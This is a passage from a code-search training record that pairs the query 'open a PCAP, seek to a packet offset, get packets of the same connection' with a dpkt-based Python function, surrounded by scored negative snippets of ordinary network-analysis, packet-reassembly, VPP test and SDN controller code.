self.assertEqual(event.packet_count, 3)\n self.assertEqual(event.protocol, 'TCP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '63.245.217.43')\n self.assertEqual(event.dest_port, 443)\n self.assertEqual(event.source_port, 1038)\n self.assertEqual(event.stream_type, 'SSL')\n self.assertEqual(event.first_packet_id, 4)\n self.assertEqual(event.last_packet_id, 6)\n\n # Test stream 6 (event 12).\n # Protocol: UDP\n # Source IP: 192.168.195.130\n # Dest IP: 192.168.195.2\n # Source Port: 55679\n # Dest Port: 53\n # Stream Type: DNS\n # Starting Packet: 4\n # Ending Packet: 6\n # Protocol Data: DNS Query for wpad.localdomain\n\n event = events[12]\n self.assertEqual(event.packet_count, 5)\n self.assertEqual(event.protocol, 'UDP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '192.168.195.2')\n self.assertEqual(event.dest_port, 53)\n self.assertEqual(event.source_port, 55679)\n self.assertEqual(event.stream_type, 'DNS')\n self.assertEqual(event.first_packet_id, 11)\n self.assertEqual(event.last_packet_id, 1307)\n self.assertEqual(\n event.protocol_data, 'DNS Query for wpad.localdomain')\n\n expected_message = (\n 'Source IP: 192.168.195.130 '\n 'Destination IP: 192.168.195.2 '\n 'Source Port: 55679 '\n 'Destination Port: 53 '\n 'Protocol: UDP '\n 'Type: DNS '\n 'Size: 380 '\n 'Protocol Data: DNS Query for wpad.localdomain '\n 'Stream Data: \\'\\\\xb8\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00'\n '\\\\x00\\\\x00\\\\x04wpad\\\\x0blocaldomain\\\\x00\\\\x00\\\\x01\\\\x00\\\\x01\\\\xb8'\n '\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x04wpa\\' '\n 'First Packet ID: 11 '\n 'Last Packet ID: 1307 '\n 'Packet Count: 5')\n expected_short_message = (\n 'Type: DNS '\n 'First Packet ID: 11')\n\n self._TestGetMessageStrings(event, expected_message, expected_short_message)", "def test_fif6(self):\n # TODO this should be ideally in setUpClass, but then we hit a bug\n # with VppIpRoute incorrectly reporting it's present when it's not\n # so we need to manually remove the vpp config, thus we cannot have\n # it shared for multiple test cases\n self.tun_ip6 = \"1002::1\"\n\n self.gre6 = VppGreInterface(self, self.src_if.local_ip6, self.tun_ip6)\n self.gre6.add_vpp_config()\n self.gre6.admin_up()\n self.gre6.config_ip6()\n\n self.vapi.ip_reassembly_enable_disable(\n 
sw_if_index=self.gre6.sw_if_index, enable_ip6=True\n )\n\n self.route6 = VppIpRoute(\n self,\n self.tun_ip6,\n 128,\n [VppRoutePath(self.src_if.remote_ip6, self.src_if.sw_if_index)],\n )\n self.route6.add_vpp_config()\n\n self.reset_packet_infos()\n for i in range(test_packet_count):\n info = self.create_packet_info(self.src_if, self.dst_if)\n payload = self.info_to_payload(info)\n # Ethernet header here is only for size calculation, thus it\n # doesn't matter how it's initialized. This is to ensure that\n # reassembled packet is not > 9000 bytes, so that it's not dropped\n p = (\n Ether()\n / IPv6(src=self.src_if.remote_ip6, dst=self.dst_if.remote_ip6)\n / UDP(sport=1234, dport=5678)\n / Raw(payload)\n )\n size = self.packet_sizes[(i // 2) % len(self.packet_sizes)]\n self.extend_packet(p, size, self.padding)\n info.data = p[IPv6] # use only IPv6 part, without ethernet header\n\n fragments = [\n x\n for _, i in self._packet_infos.items()\n for x in fragment_rfc8200(i.data, i.index, 400)\n ]\n\n encapped_fragments = [\n Ether(dst=self.src_if.local_mac, src=self.src_if.remote_mac)\n / IPv6(src=self.tun_ip6, dst=self.src_if.local_ip6)\n / GRE()\n / p\n for p in fragments\n ]\n\n fragmented_encapped_fragments = [\n x\n for p in encapped_fragments\n for x in (\n fragment_rfc8200(\n p, 2 * len(self._packet_infos) + p[IPv6ExtHdrFragment].id, 200\n )\n if IPv6ExtHdrFragment in p\n else [p]\n )\n ]\n\n self.src_if.add_stream(fragmented_encapped_fragments)\n\n self.pg_enable_capture(self.pg_interfaces)\n self.pg_start()\n\n self.src_if.assert_nothing_captured()\n packets = self.dst_if.get_capture(len(self._packet_infos))\n self.verify_capture(packets, IPv6)\n\n # TODO remove gre vpp config by hand until VppIpRoute gets fixed\n # so that it's query_vpp_config() works as it should\n self.gre6.remove_vpp_config()", "def process_mptcp_pkt_from_client(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n flow_id = acks[saddr, sport, daddr, dport][co.FLOW_ID]\n if conn_acks[conn_id][co.S2C] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.S2C]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_C2S] and (dss - conn_acks[conn_id][co.C2S]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.C2S][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission! (take into account the seq overflow)\n mptcp_connections[conn_id].attr[co.C2S][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_C2S][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]))\n conn_acks[conn_id][HSEQ_C2S][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_C2S].add(dss)\n conn_acks[conn_id][HSEQ_C2S][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]]\n\n conn_acks[conn_id][co.S2C] = dack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][CLIENT] = ts_delta" ]
[ "0.6305733", "0.6296941", "0.6157458", "0.5966342", "0.58530146", "0.58158106", "0.5761478", "0.5597372", "0.5591383", "0.5550107", "0.5509687", "0.5483427", "0.5468516", "0.54531425", "0.53616995", "0.52512836", "0.5180603", "0.51701915", "0.5169873", "0.5168804", "0.51653785", "0.5126963", "0.51233846", "0.5106145", "0.50977445", "0.5079675", "0.5016412", "0.50007594", "0.49968618", "0.49965763", "0.49953368", "0.49942407", "0.49909738", "0.49820396", "0.49802232", "0.49529237", "0.48943526", "0.48707145", "0.4865862", "0.48598737", "0.48381108", "0.48112306", "0.4807113", "0.4805623", "0.47978213", "0.47846407", "0.47839126", "0.47786963", "0.4777329", "0.47735485", "0.47603983", "0.47534236", "0.4752056", "0.47424507", "0.474191", "0.473586", "0.4734663", "0.47344148", "0.473373", "0.4728742", "0.46955514", "0.46919352", "0.46884263", "0.46799234", "0.46770468", "0.46714595", "0.4668274", "0.46682003", "0.4660133", "0.465304", "0.46490636", "0.46447363", "0.46406952", "0.4638043", "0.46327043", "0.46297887", "0.4626025", "0.46151245", "0.46071598", "0.4598257", "0.45967638", "0.45846555", "0.4576061", "0.4565716", "0.45650145", "0.4563647", "0.45631775", "0.45631775", "0.45470515", "0.45437267", "0.45422474", "0.45300284", "0.45286772", "0.4526037", "0.45260283", "0.452305", "0.45210886", "0.45167777", "0.4512437", "0.451243" ]
0.67187
0
Open a PCAP, seek to a packet offset, then get all packets belonging to the same connection
def packets_for_stream(fobj, offset): pcap = dpkt.pcap.Reader(fobj) pcapiter = iter(pcap) ts, raw = pcapiter.next() fobj.seek(offset) for p in next_connection_packets(pcapiter, linktype=pcap.datalink()): yield p
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def print_packets(pcap):\n\n # For each packet in the pcap process the contents\n for timestamp, buf, hdr_len in pcap:\n \n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n\n # Make sure the Ethernet data contains an IP packet\n if not isinstance(eth.data, dpkt.ip.IP):\n # print('Non IP Packet type not supported %s\\n' % eth.data.__class__.__name__)\n continue\n\n # Now unpack the data within the Ethernet frame (the IP packet)\n # Pulling out src, dst, length, fragment info, TTL, and Protocol\n ip = eth.data\n\n # Pull out fragment information (flags and offset all packed into off field, so use bitmasks)\n # do_not_fragment = bool(ip.off & dpkt.ip.IP_DF)\n # more_fragments = bool(ip.off & dpkt.ip.IP_MF)\n # fragment_offset = ip.off & dpkt.ip.IP_OFFMASK\n\n # Print out the info\n # print('IP: %s -> %s (len=%d ttl=%d DF=%d MF=%d offset=%d)\\n' % \\\n # (inet_to_str(ip.src), inet_to_str(ip.dst), ip.len, ip.ttl, do_not_fragment, more_fragments, fragment_offset)) \n\n pkt = Packet(timestamp, buf, hdr_len)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP or ip.p == dpkt.ip.IP_PROTO_UDP: \n # all flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in all_flows:\n all_flows[flow] = [pkt]\n else:\n x = len(all_flows[flow]) - 1\n if x < 0:\n all_flows[flow].append(pkt)\n else:\n if time_diff(all_flows[flow][x].timestamp, timestamp) <= 5400: #90mins\n all_flows[flow].append(pkt)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP: \n # TCP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in tcp_flows:\n tcp_flows[flow] = [pkt]\n else:\n x = len(tcp_flows[flow]) - 1\n if x < 0:\n tcp_flows[flow].append(pkt)\n else:\n if time_diff(tcp_flows[flow][x].timestamp, timestamp) <= 5400:\n tcp_flows[flow].append(pkt)\n all_host_pairs(pkt, ip)\n elif ip.p == dpkt.ip.IP_PROTO_UDP:\n # UDP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in udp_flows:\n udp_flows[flow] = [pkt]\n else:\n x = len(udp_flows[flow]) - 1\n if x < 0:\n udp_flows[flow].append(pkt)\n else:\n if time_diff(udp_flows[flow][x].timestamp, timestamp) <= 5400:\n udp_flows[flow].append(pkt)\n else:\n continue\n\n print(\"Number of All flows: %d | Number of TCP flows: %d | Number of UDP flows: %d\" % (len(all_flows), len(tcp_flows), len(udp_flows)))\n\n # -- Flow Duration\n for f in all_flows:\n size = len(all_flows[f])\n if size >= 2:\n all_flow_dur.append(time_diff(all_flows[f][0].timestamp, all_flows[f][size-1].timestamp))\n \n for f in tcp_flows:\n size = len(tcp_flows[f])\n if size >= 2:\n tcp_flow_dur.append(time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp))\n \n for f in udp_flows:\n size = len(udp_flows[f])\n if size >= 2:\n udp_flow_dur.append(time_diff(udp_flows[f][0].timestamp, udp_flows[f][size-1].timestamp))\n\n print \"lens: \", len(all_flow_dur), len(tcp_flow_dur), len(udp_flow_dur)\n\n # -- Flow Size\n for f in all_flows:\n f_bytes = 0\n size = len(all_flows[f])\n all_flow_size_pkt.append(size)\n for p in all_flows[f]:\n f_bytes += p.length\n all_flow_size_byte.append(f_bytes)\n \n for f in tcp_flows:\n f_bytes = 0\n f_overhead = 0\n size = len(tcp_flows[f])\n tcp_flow_size_pkt.append(size)\n for p in tcp_flows[f]:\n f_bytes += p.length\n f_overhead += 18 + 20 #+ tcp_hdr\n tcp_flow_size_byte.append(f_bytes)\n if f_bytes == 0:\n f_bytes = 9999\n tcp_flow_size_overhead.append(f_overhead/float(f_bytes))\n \n for f in 
udp_flows:\n f_bytes = 0\n size = len(udp_flows[f])\n udp_flow_size_pkt.append(size)\n for p in udp_flows[f]:\n f_bytes += p.length\n udp_flow_size_byte.append(f_bytes)\n\n # -- Inter-packet Arrival time\n for f in all_flows:\n for i in range(len(all_flows[f])-1):\n all_flow_time.append(time_diff(all_flows[f][i].timestamp, all_flows[f][i+1].timestamp))\n\n for f in tcp_flows:\n for i in range(len(tcp_flows[f])-1):\n tcp_flow_time.append(time_diff(tcp_flows[f][i].timestamp, tcp_flows[f][i+1].timestamp))\n\n for f in udp_flows:\n for i in range(len(udp_flows[f])-1):\n udp_flow_time.append(time_diff(udp_flows[f][i].timestamp, udp_flows[f][i+1].timestamp))\n\n # -- TCP State\n for f in tcp_flows:\n size = len(tcp_flows[f])\n last_pkt = tcp_flows[f][size-1]\n tcp = dpkt.ethernet.Ethernet(last_pkt.buf).data.data\n \n if (tcp.flags & dpkt.tcp.TH_SYN) != 0:\n f.state = 'Request'\n elif (tcp.flags & dpkt.tcp.TH_RST) != 0:\n f.state = 'Reset'\n elif (tcp.flags & dpkt.tcp.TH_FIN) != 0 and (tcp.flags & dpkt.tcp.TH_ACK) != 0:\n f.state = 'Finished'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) <= 300:\n f.state = 'Ongoing'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) > 300 \\\n and (tcp.flags & dpkt.tcp.TH_RST) == 0 and (tcp.flags & dpkt.tcp.TH_FIN) == 0:\n f.state = 'Failed'\n\n show_cdf_graphs()", "def pcap(self, fname):\n\t\tcap = pcapy.open_offline(fname)\n\n\t\tself.map = []\n\t\tself.p = PacketDecoder()\n\t\tcap.loop(0, self.process)\n\n\t\treturn self.map", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not (pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n 
pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def test():\n with open('univ1_pt8.pcap', 'rb') as f: #univ1_trace/univ1_pt8\n pcap = Reader(f)\n print_packets(pcap)\n # top_flows()\n host_pairs()", "def find_dac():\n\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ts.bind((\"0.0.0.0\", 7654))\n\n\twhile True:\n\t\tdata, addr = s.recvfrom(1024)\n\t\tbp = BroadcastPacket(data)\n\t\t\n\t\tprint \"Packet from %s: \" % (addr, )\n\t\tbp.dump()", "def parse_packets(pcap):\n # For each packet in the pcap process the contents\n flow_Info = []\n times = 0\n for timestamp, buf in pcap:\n times += 1\n tmp_flow_Info = {}\n\n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # Unpack the data whthin the Ethernet frame (the IP packet)\n ip = eth.data\n\n # if protocol(ip.p) is not UDP(17) ,skip this packet\n if ip.p != 17:\n continue\n\n udp = ip.data\n # Temp_data = parse_data(eth.data.udp.data)\n # Filter CoAP by port\n if(udp.sport != 5683 or udp.dport != 5683):\n continue\n\n str_udp_data = parse_data(eth.data.udp.data)\n # skip packets of Non_confirmable\n if str_udp_data[0] == '5': \n continue\n\n cycle = 0\n index = 0\n Udp_data = []\n \n len_str_udp_data = len(str_udp_data)\n while cycle < (len_str_udp_data//3+1):\n # Udp_data.append(int('0x'+Str_Udp_data[index:index + 2], 16))\n Udp_data.append(int('0x' + str_udp_data[index:index + 2], 16))\n cycle += 1\n index += 3\n tmp_flow_Info['udp_data'] = (Udp_data)\n\n # confirmable or ack\n tmp_flow_Info['Coap_type'] = str_udp_data[0]\n #print(str_udp_data) \n \n # skip space and get \"Message ID\" \n HexMide = str_udp_data[6:8] + str_udp_data[9:11]\n tmp_flow_Info['Mid'] = int('0x'+HexMide, 16)\n\n tmp_flow_Info['Timestamp'] = str(datetime.datetime.fromtimestamp(timestamp))\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n tmp_flow_Info['src'] = inet_to_str(ip.src)\n tmp_flow_Info['dst'] = inet_to_str(ip.dst)\n\n tmp_flow_Info['sport'] = udp.sport\n tmp_flow_Info['dport'] = udp.dport\n flow_Info.append(tmp_flow_Info)\n\n return flow_Info", "def pull(self):\n\n # For each packet in the pcap process the contents\n for item in self.input_stream:\n\n # Print out the timestamp in UTC\n print('%s -' % item['timestamp'], end='')\n\n # Transport info\n if item['transport']:\n print(item['transport']['type'], end='')\n\n # Print out the Packet info\n packet_type = item['packet']['type']\n print(packet_type, end='')\n packet = item['packet']\n if packet_type in ['IP', 'IP6']:\n # Is there domain info?\n if 'src_domain' in packet:\n print('%s(%s) --> %s(%s)' % (net_utils.inet_to_str(packet['src']), packet['src_domain'],\n net_utils.inet_to_str(packet['dst']), packet['dst_domain']), end='')\n else:\n print('%s --> %s' % (net_utils.inet_to_str(packet['src']), net_utils.inet_to_str(packet['dst'])), end='')\n else:\n print(str(packet))\n\n # Only include application if we have it\n if item['application']:\n print('Application: %s' % item['application']['type'], end='')\n print(str(item['application']), end='')\n\n # Just for newline\n print()", "def _parse(self):\n \n global _tcp_buf\n _tcp_buf = {}\n 
number = 1\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n self.pcap_packets.append(pcap_packet)\n pcap_packet.pcap_num = number\n number += 1\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n \n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip.packet[pcap_packet.ip.header_len: ])\n \n #skip the packets that is not http packet\n if (pcap_packet.tcp.src_port != 80 and pcap_packet.tcp.dst_port != 80):\n continue\n \n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, pcap_packet.pcap_num)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def recv_raw(self) -> Dict[str, Any]:\n while True:\n try:\n packet = self.__recv_frame()\n except UnknownPacketException:\n continue\n\n # Hack for sniffing on localhost\n if packet['address']['interface'] == 'lo' and packet['address']['type'] != 4:\n continue\n\n if self.address and self.port:\n if (\n packet['ip_header']['source_address'] == self.address and\n packet['tcp_header']['source_port'] == self.port\n ):\n return packet\n if (\n packet['ip_header']['destination_address'] == self.address and\n packet['tcp_header']['destination_port'] == self.port\n ):\n return packet\n elif self.address:\n if (\n packet['ip_header']['source_address'] == self.address or\n packet['ip_header']['destination_address'] == self.address\n ):\n return packet\n elif self.port:\n if (\n packet['tcp_header']['source_port'] == self.port or\n packet['tcp_header']['destination_port'] == self.port\n ):\n return packet\n else:\n return packet", "def extract_tstat_data(pcap_filepath):\n connections = {}\n conn_id = 0\n print('We are here')\n with co.cd(os.path.basename(pcap_filepath[:-5])):\n with co.cd(os.listdir('.')[0]):\n print(connections)\n # Complete TCP connections\n connections, conn_id = extract_tstat_data_tcp_complete('log_tcp_complete', connections, conn_id)\n # Non complete TCP connections (less info, but still interesting data)\n connections, conn_id = extract_tstat_data_tcp_nocomplete('log_tcp_nocomplete', connections, conn_id)\n\n return connections", "def next_packet(filename, memorymap=True):\n with open(filename, 'rb') as f:\n \n #memory map the file if necessary (prob requires 64 bit systems)\n _file = f\n if memorymap:\n _file = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)\n \n while True:\n packet = _file.read(TS.PACKET_SIZE)\n if packet:\n # first byte SHOULD be the sync byte\n # but if it isn't find one.\n if packet[0] != TS.SYNC_BYTE:\n start_byte = 0\n print packet[0]\n for i in range(start_byte, TS.PACKET_SIZE):\n if packet[i] == TS.SYNC_BYTE:\n start_byte = i\n break\n # didn't find a new start? 
FAIL\n if start_byte == 0:\n raise Exception(\"failure to find sync byte in ts packet size.\")\n continue\n remainder = _file.read(TS.PACKET_SIZE - start_byte)\n packet = packet[start_byte:] + remainder\n yield packet\n else:\n break", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. 
and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next 
measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == 